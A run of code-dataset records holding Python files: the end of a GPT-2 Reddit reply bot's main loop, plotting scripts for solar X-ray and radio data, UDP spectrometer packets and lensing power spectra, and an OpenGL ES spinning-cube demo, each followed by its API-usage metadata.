self.log(\"An error occured while replying\")\n return\n\n self.log(\"Starting Run... \"+str(time.time()))\n # Get the top 5 values from our subreddit\n all = self.reddit.subreddit('all')\n with parallel_backend('threading', n_jobs=n_threads):\n Parallel()(delayed(do_work)(self, comment) for comment in tqdm.tqdm(all.stream.comments(skip_existing=True)))\n\n self.log(\"DONE!!!\\n\\n============================================================\\n\")\n\nwith open(\"./reddit_bot_logs.txt\", 'a+') as log:\n w = sys.stdout.write\n def wlog(data, flush=False, silent=False):\n data += \"\\n\"\n if not silent:\n w(data)\n log.write(data)\n if flush:\n log.flush()\n bot = GPT2Bot(wlog)\n bot.run_loop()\n", "sub_path": "reddit_bot.py", "file_name": "reddit_bot.py", "file_ext": "py", "file_size_in_byte": 12679, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "string.printable", "line_number": 23, "usage_type": "attribute"}, {"api_name": "threading.Lock", "line_number": 48, "usage_type": "call"}, {"api_name": "praw.Reddit", "line_number": 51, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 52, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "re.DOTALL", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pexpect.spawn", "line_number": 74, "usage_type": "call"}, {"api_name": "pexpect.exceptions", "line_number": 80, "usage_type": "attribute"}, {"api_name": "sample.decode", "line_number": 84, "usage_type": "call"}, {"api_name": "praw.models", "line_number": 120, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 125, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 125, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 126, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 126, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 126, "usage_type": "attribute"}, {"api_name": "praw.models", "line_number": 151, "usage_type": "attribute"}, {"api_name": "praw.models", "line_number": 163, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 180, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 180, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 180, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 181, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 181, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 181, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 207, "usage_type": "call"}, {"api_name": "praw.models.Submission", "line_number": 208, "usage_type": "call"}, {"api_name": "praw.models", "line_number": 208, "usage_type": "attribute"}, {"api_name": "joblib.parallel_backend", "line_number": 210, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 211, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 211, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 211, "usage_type": "call"}, {"api_name": "joblib.parallel_backend", "line_number": 228, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 229, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 229, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 229, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 231, "usage_type": "call"}, {"api_name": "joblib.parallel_backend", "line_number": 239, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 240, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 240, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 240, "usage_type": "call"}, {"api_name": "praw.models", "line_number": 242, "usage_type": "attribute"}, {"api_name": "praw.models", "line_number": 256, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 273, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 273, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 273, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 274, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 274, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 275, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 275, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 275, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 304, "usage_type": "call"}, {"api_name": "joblib.parallel_backend", "line_number": 307, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 308, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 308, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 308, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 313, "usage_type": "attribute"}]} +{"seq_id": "594038772", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 12 02:08:41 2021\n\n@author: svlesovoi\n\"\"\"\n\nimport json\nimport numpy as NP\nimport pylab as PL\nfrom astropy.io import fits\nfrom scipy import signal\n\ndef hhmm_format(t, pos):\n hh = (int)(t / 3600.);\n t -= hh*3600.;\n mm = (int)(t / 60.);\n return '%02d:%02d' % (hh,mm);\n\nwin = signal.windows.gaussian(2199,2155)\nrainbowColors = PL.get_cmap('rainbow')\n\n#goesFile = open('xrays-6-hour.json')\ngoesFile = open('xrays-1-day.json')\ngoesData = json.load(goesFile)\ngoesFile.close()\n\nN = len(goesData)\nxrays_time = NP.zeros(N//2)\nxrays_4_8 = NP.zeros(N//2)\nxrays_005_04 = NP.zeros(N//2)\n\nfor i in range(N):\n if i%2:\n xrays_4_8[i//2] = goesData[i]['flux']\n hhmm = goesData[i]['time_tag'].split('T')[1].split(':')[0:2]\n xrays_time[i//2] = 3600*int(hhmm[0]) + 60*int(hhmm[1])\n if xrays_time[i//2] > 10*3600:\n xrays_time[i//2] -= 24*3600\n else:\n xrays_005_04[i//2] = goesData[i]['flux']\n\ncF = fits.open('srh_cp_20210412.fits')\nsrhFreqList = cF[1].data['frequencies']\nsrhTime = cF[2].data['time'] # necc\nsrhCorrI = cF[2].data['I']\nsrhCorrV = cF[2].data['V']\nsrhFluxI = cF[2].data['flux_I'] # necc\nsrhMeanFluxI = srhFluxI.mean(axis=0)\nsrhMeanFluxISmoothed = signal.convolve(srhMeanFluxI,win,mode='same')/win.sum()\n\nt0 = 200\n\nfig = PL.figure()\nsub = fig.add_subplot(1,1,1);\nsub.set_ylabel('flux');\nsub.set_xlabel('UT');\nsub.xaxis.set_major_locator(PL.MultipleLocator(1800));\nsub.xaxis.set_major_formatter(PL.FuncFormatter(hhmm_format));\nsub.xaxis.set_minor_locator(PL.MultipleLocator(600));\nsub.set_xlim(3600,6.0*3600)\nsub.set_ylim(0,5e-7)\n\nsub.plot(xrays_time[t0:],xrays_4_8[t0:],label='GOES X-Ray 0.1-0.8 nm',color='red',markersize=0.2)\nsub.plot(xrays_time[t0:],xrays_005_04[t0:],label='GOES X-Ray 0.05-0.4 nm',color='blue',markersize=0.2)\nfor freq in range(srhFreqList.shape[0]):\n sub.plot(srhTime[freq],srhCorrI[freq]*1e-4,'.',markersize=0.2,color=rainbowColors(100+(srhFreqList.shape[0] - freq)*20),label='SRH %d MHz'%(srhFreqList[freq]*1e-3))\n# sub.plot(srhTime[freq],srhCorrV[freq]*1e-4)\n#sub.plot(srhTime[0],(srhMeanFluxI - srhMeanFluxISmoothed)*5e-9 + 1e-8)\nsub.plot([3600,10*3600],[1e-7,1e-7], label='X-ray flare class A')\nsub.grid()\nsub.legend(markerscale=50)\nsub.set_title('SRH and GOES incredible coincidence , %s'%(cF[0].header['DATE-OBS']))\n", "sub_path": "srhGoesXray.py", "file_name": "srhGoesXray.py", "file_ext": "py", "file_size_in_byte": 2366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scipy.signal.windows.gaussian", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.signal.windows", "line_number": 21, "usage_type": "attribute"}, {"api_name": "scipy.signal", "line_number": 21, "usage_type": "name"}, {"api_name": "pylab.get_cmap", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 44, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 44, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 51, "usage_type": "name"}, {"api_name": "pylab.figure", "line_number": 55, "usage_type": "call"}, {"api_name": "pylab.MultipleLocator", "line_number": 59, "usage_type": "call"}, {"api_name": "pylab.FuncFormatter", "line_number": 60, "usage_type": "call"}, {"api_name": "pylab.MultipleLocator", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "39072350", "text": "#!/opt/vegas/bin/python2.6\n\nimport socket\nfrom matplotlib import pyplot as plt\nimport struct\nimport numpy as np\n\nudp_ip='10.0.0.145'\nudp_port=60000\nsize=8208 #packet size\nf_lo = 93.75\nbw=2*f_lo\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nsock.bind((udp_ip, udp_port))\ndata, addr = sock.recvfrom(size)\nsock.close()\n\na = np.array(struct.unpack('>8208b', data), dtype=np.int8)\na = a[16:] # skip 16-byte header\n#{0, 2, 1, 3} # 2 tones\n#{0, 2, 3, 1}\n#{1, 3, 0, 2}\n#{1, 3, 2, 0}\n#{2, 0, 1, 3}\n#{2, 0, 3, 1}\n#{3, 1, 0, 2}\n#{3, 1, 2, 0}\nrealX = a[0::4]\nimagX = a[1::4]\nrealY = a[2::4]\nimagY = a[3::4]\n\nplt.subplot(421)\nplt.plot(realX, '-o')\nplt.subplot(423)\nplt.plot(imagX, '-o')\nplt.subplot(425)\nplt.plot(realY, '-o')\nplt.subplot(427)\nplt.plot(imagY, '-o')\n\nf = np.linspace(f_lo - bw/2., f_lo + bw/2., 2048)\n\nX = np.zeros(2048, dtype=np.complex64)\nX.real = realX.astype(np.float)\nX.imag = imagX.astype(np.float)\n\nY = np.zeros(2048, dtype=np.complex64)\nY.real = realY.astype(np.float)\nY.imag = imagY.astype(np.float)\n\nplt.subplot(422)\nplt.plot(f, 10 * np.log10(np.abs(np.fft.fftshift(np.fft.fft(X, 2048)))))\n\nplt.subplot(424)\nplt.plot(f, 10 * np.log10(np.abs(np.fft.fftshift(np.fft.fft(Y, 2048)))))\n\nplt.subplot(426)\nplt.plot(f, 10 * np.log10(np.fft.fftshift(np.fft.fft(X, 2048) * np.fft.fft(Y, 2048).conjugate()).real))\n\nplt.subplot(428)\nplt.plot(f, 10 * np.log10(np.fft.fftshift(np.fft.fft(X, 2048) * np.fft.fft(Y, 2048).conjugate()).imag))\n\nplt.show()\n\n", "sub_path": "scripts/l1_lbw1/plot_raw_l1.py", "file_name": "plot_raw_l1.py", "file_ext": "py", "file_size_in_byte": 1523, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.socket", "line_number": 14, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 14, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 14, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 15, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.complex64", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.complex64", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 52, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.fft.fftshift", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.fft.fftshift", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.fft.fftshift", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.fft.fftshift", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "111569849", "text": "## SY 27/6/19\n## Plots true_corr power spectra for different datasets.\n\nfrom astropy.io import fits\nimport healpy as hp\nimport scipy as sp\nimport numpy as np\nimport pylab as P\nimport kappa_lya\nfrom kappa_lya import *\nimport sys\nfrom collections import OrderedDict\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.offsetbox import AnchoredText\n\n\ndef get_model(c_ell):\n y = (c_ell / cl_input)\n x = np.arange(y.size)\n z = np.polyfit(x, y, 5)\n model = np.polyval(z, x)\n return model, x\n\n\nesttype = 'midpoint'\n\n##- Open kappa true-correlation and input c_ells\ncl_noisy = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_autos_noisy_rt70.txt')\nclx_noisy = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_crosses_noisy_rt70.txt')\n\ncl_cut = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_autos_cut_rt70.txt')\nclx_cut = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_crosses_cut_rt70.txt')\n\ncl_noiseless = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_autos_noiseless_rt70.txt')\nclx_noiseless = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_crosses_noiseless_rt70.txt')\n\ncl_input = np.loadtxt('maps/input/Cl_xi_input.txt')\ninput_mean = np.loadtxt('maps/input/Cl_input_mean.txt')\n\nx = []\nmodel = []\nkappa_true = [cl_noisy, clx_noisy, cl_cut, clx_cut, cl_noiseless, clx_noiseless]\nfor i in kappa_true:\n mod, ell_true = get_model(i)\n model.append(mod)\n x.append(ell_true)\n \n\n##- Setup figures\nP.rcParams.update({'font.size':18})\nP.ion()\nncolors=9\ncolors = P.cm.Set1(np.linspace(0,1,ncolors))\n#colors=['#396AB1','#DA7C30','#3E9651','#CC2529','#535154','#6B4C9A','#922428','#948B3D']\n\n##- Plot figure\nP.figure(figsize=(8.2,6))\n#P.plot(input_mean[0], color=colors[1], linewidth=2.0, linestyle=\"-\",label='Masked Input')\n\nP.plot(cl_noisy, color=colors[2], lw=2, linestyle=\"-\",label='Noisy Auto')\nP.plot(clx_noisy, color=colors[2], lw=2, linestyle=\"--\",label='Noisy Cross')\nP.plot(cl_cut, color=colors[3], lw=2, linestyle=\"-\",label='Noiseless Auto')\nP.plot(clx_cut, color=colors[3], lw=2, linestyle=\"--\",label='Noiseless cross')\nP.plot(cl_noiseless, color=colors[4], lw=2, linestyle=\"-\",label='High Density Auto')\nP.plot(clx_noiseless, color=colors[4], lw=2, linestyle=\"--\",label='High Density Cross')\n\nP.title('True_corr')\nP.axhline(0., color='k', ls=':')\nP.ylabel(r'$\\ell \\ C_{\\ell}^{\\rm{true, est}}$', fontsize=18)\nP.xlabel(r'$\\ell$', fontsize=18)\nP.xlim([0, 800])\n#P.ylim([0.0, 1.1e-6])\nP.ticklabel_format(style='sci', axis='y', scilimits=(0,0), useOffset=False)\nhandles, labels = P.gca().get_legend_handles_labels()\nby_label = OrderedDict(zip(labels, handles))\nP.legend(by_label.values(), by_label.keys(), numpoints = 1, loc = 'upper right', fontsize=16)\n\n\n", "sub_path": "bin/plot_true_corrs.py", "file_name": "plot_true_corrs.py", "file_ext": "py", "file_size_in_byte": 2652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.arange", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 38, "usage_type": "call"}, {"api_name": "pylab.rcParams.update", "line_number": 50, "usage_type": "call"}, {"api_name": "pylab.rcParams", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pylab.ion", "line_number": 51, "usage_type": "call"}, {"api_name": "pylab.cm.Set1", "line_number": 53, "usage_type": "call"}, {"api_name": "pylab.cm", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 53, "usage_type": "call"}, {"api_name": "pylab.figure", "line_number": 57, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 62, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 63, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 64, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 65, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 67, "usage_type": "call"}, {"api_name": "pylab.axhline", "line_number": 68, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 69, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 70, "usage_type": "call"}, {"api_name": "pylab.xlim", "line_number": 71, "usage_type": "call"}, {"api_name": "pylab.ticklabel_format", "line_number": 73, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 74, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 75, "usage_type": "call"}, {"api_name": "pylab.legend", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "419683226", "text": "import pygame\nfrom rpigl import glesutils, transforms\nfrom rpigl.gles2 import *\n\nvertices = [(0.0,0.0,0.0), (0.5,0.0,0.0), (0.5,0.5,0.0), (0.0, 0.5,0.0), \n (0.0,0.0,-0.5), (0.5,0.0,-0.5), (0.5,0.5,-0.5), (0.0, 0.5,-0.5)]\n\nouter_vertices = [(-0.5, -0.5, 0.5), (0.5, -0.5, 0.5), (0.5, 0.5, 0.5), (-0.5, 0.5, 0.5),\n (-0.5, -0.5, -0.5), (0.5, -0.5, -0.5), (0.5, 0.5, -0.5), (-0.5, 0.5, -0.5)]\n\nindices_face_1 = (0, 1, 2, 0, 3)\n\nindices_face_2 = (4, 5, 6, 4, 7)\n\nindices_face_3 = (1, 5, 6, 1, 2)\n\nindices_face_4 = (0, 4, 7, 0 ,3)\n\nindices_outer = (0, 1, 2, 3, 0, 4, 5, 1, 5, 6, 2, 6, 7, 3, 7, 4)\n\nindices_points = (0, 1, 2, 3)\n\narray_spec = glesutils.ArraySpec(\"vertex_attrib:3f\")\n\nvertex_glsl = array_spec.glsl() + \"\"\"\nuniform mat4 transform_matrix;\nvoid main(void) {\n gl_Position = transform_matrix * vec4(vertex_attrib, 1.0);\n gl_PointSize = 2.0;\n}\n\"\"\"\n\nfragment_glsl = \"\"\"\nuniform vec4 color;\nvoid main(void) {\n gl_FragColor = color;\n}\n\"\"\"\n\n\n\nclass MyWindow(glesutils.GameWindow):\n\n def init(self):\n\n self.angle = 10\n self.framerate = 20\n\n self.vertex_shader = glesutils.VertexShader(vertex_glsl)\n self.fragment_shader = glesutils.FragmentShader(fragment_glsl)\n\n self.program1 = glesutils.Program(self.vertex_shader, self.fragment_shader)\n self.program1.use()\n\n glClearDepthf(1.0)\n glDepthFunc(GL_LESS)\n glEnable(GL_DEPTH_TEST)\n\n\n glClearColor(0.5, 0.5, 0.5, 1)\n\n self.program1.uniform.light_dir.value = ((0, 1, -1))\n\n self.verteces_buffer = array_spec.create_buffer(vertex_attrib=vertices)\n\n self.elements_face_1 = glesutils.ElementBuffer(indices_face_1)\n self.elements_face_2 = glesutils.ElementBuffer(indices_face_2)\n self.elements_face_3 = glesutils.ElementBuffer(indices_face_3)\n self.elements_face_4 = glesutils.ElementBuffer(indices_face_4)\n\n self.elements_outer = glesutils.ElementBuffer(indices_outer)\n self.elements_points = glesutils.ElementBuffer(indices_points)\n\n self.outer_matrix = transforms.compose(transforms.rotation_degrees(20, \"z\"), \n transforms.rotation_degrees(20, \"y\"), \n transforms.rotation_degrees(20, \"x\"),\n transforms.scaling(1.2))\n\n self.points_matrix = transforms.compose(transforms.stretching(0.1, 1, 1.5),\n transforms.translation(-0.5, -0.5, -0.5))\n\n def on_frame(self, time):\n self.angle = self.angle + time*0.02\n self.redraw()\n\n def draw(self):\n#Draw outer lines\n self.program1.uniform.transform_matrix.value = self.outer_matrix\n self.program1.uniform.color.value = (1, 1, 1, 1)\n self.verteces_buffer.draw(elements=self.elements_outer, mode=GL_LINE_STRIP)\n#Draw points\n self.program1.uniform.transform_matrix.value = self.points_matrix\n self.program1.uniform.color.value = (0, 0, 0, 1)\n self.verteces_buffer.draw(elements=self.elements_points, mode=GL_POINTS) \n\n#Draw spinning cube\n rotation_matrix = transforms.compose(transforms.rotation_degrees(self.angle, \"z\"), \n transforms.rotation_degrees(self.angle, \"y\"),\n transforms.compose(transforms.rotation_degrees(self.angle, \"x\")))\n\n self.program1.uniform.transform_matrix.value = rotation_matrix\n self.program1.uniform.color.value = (1, 0, 0, 1)\n self.verteces_buffer.draw(elements=self.elements_face_1, mode=GL_TRIANGLE_STRIP)\n self.program1.uniform.color.value = (0, 1, 0, 1)\n self.verteces_buffer.draw(elements=self.elements_face_2, mode=GL_TRIANGLE_STRIP)\n self.program1.uniform.color.value = (0, 0, 1, 1)\n self.verteces_buffer.draw(elements=self.elements_face_3, mode=GL_TRIANGLE_STRIP)\n self.program1.uniform.color.value = (0, 1, 1, 1)\n self.verteces_buffer.draw(elements=self.elements_face_4, mode=GL_TRIANGLE_STRIP)\n\n\nMyWindow(200, 200, pygame.RESIZABLE).run()", "sub_path": "examples/chapter6-spinning-cube.py", "file_name": "chapter6-spinning-cube.py", "file_ext": "py", "file_size_in_byte": 3964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "rpigl.glesutils.ArraySpec", "line_number": 23, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 23, "usage_type": "name"}, {"api_name": "rpigl.glesutils.GameWindow", "line_number": 42, "usage_type": "attribute"}, {"api_name": "rpigl.glesutils", "line_number": 42, "usage_type": "name"}, {"api_name": "rpigl.glesutils.VertexShader", "line_number": 49, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 49, "usage_type": "name"}, {"api_name": "rpigl.glesutils.FragmentShader", "line_number": 50, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 50, "usage_type": "name"}, {"api_name": "rpigl.glesutils.Program", "line_number": 52, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 52, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 66, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 66, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 67, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 67, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 68, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 68, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 69, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 69, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 71, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 71, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 72, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 72, "usage_type": "name"}, {"api_name": "rpigl.transforms.compose", "line_number": 74, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 74, "usage_type": "name"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 74, "usage_type": "call"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 75, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 75, "usage_type": "name"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 76, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 76, "usage_type": "name"}, {"api_name": "rpigl.transforms.scaling", "line_number": 77, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 77, "usage_type": "name"}, {"api_name": "rpigl.transforms.compose", "line_number": 79, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 79, "usage_type": "name"}, {"api_name": "rpigl.transforms.stretching", "line_number": 79, "usage_type": "call"}, {"api_name": "rpigl.transforms.translation", "line_number": 80, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 80, "usage_type": "name"}, {"api_name": "rpigl.transforms.compose", "line_number": 97, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 97, "usage_type": "name"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 97, "usage_type": "call"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 98, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 98, "usage_type": "name"}, {"api_name": "rpigl.transforms.compose", "line_number": 99, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 99, "usage_type": "name"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.RESIZABLE", "line_number": 112, "usage_type": "attribute"}]} +{"seq_id": 